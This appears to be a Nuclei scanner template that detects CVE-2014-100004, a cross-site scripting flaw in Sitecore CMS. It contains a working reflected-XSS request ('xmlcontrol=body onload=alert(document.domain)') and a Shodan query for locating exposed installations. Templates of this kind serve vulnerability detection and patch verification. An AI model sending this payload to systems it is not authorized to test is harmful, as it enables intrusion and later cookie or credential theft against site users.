id: CVE-2014-100004 info: name: Sitecore CMS - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | Sitecore CMS contains a cross-site scripting vulnerability via the "special way" of displaying XML Controls directly, which allows for a Cross Site Scripting Attack. impact: | Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users. remediation: | Update to a patched version of Sitecore CMS or apply vendor security updates. reference: - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273 - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2014-100004 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-100004 epss-score: 0.0033 epss-percentile: 0.56481 cwe-id: CWE-79 cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: sitecore product: sitecore.net shodan-query: html:"Sitecore" tags: cve,cve2014,xss,sitecore,cms,vuln http: - method: GET path: - "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a004730450220062646c6479349ceea054efdcc2225219d87168a583b73d935009ec05b8c462a022100a6c4614d66c56292e9330254f0444e713d06a7b1ba55e46a453906145f28e645:922c64590222798bb761d5b6d8e72950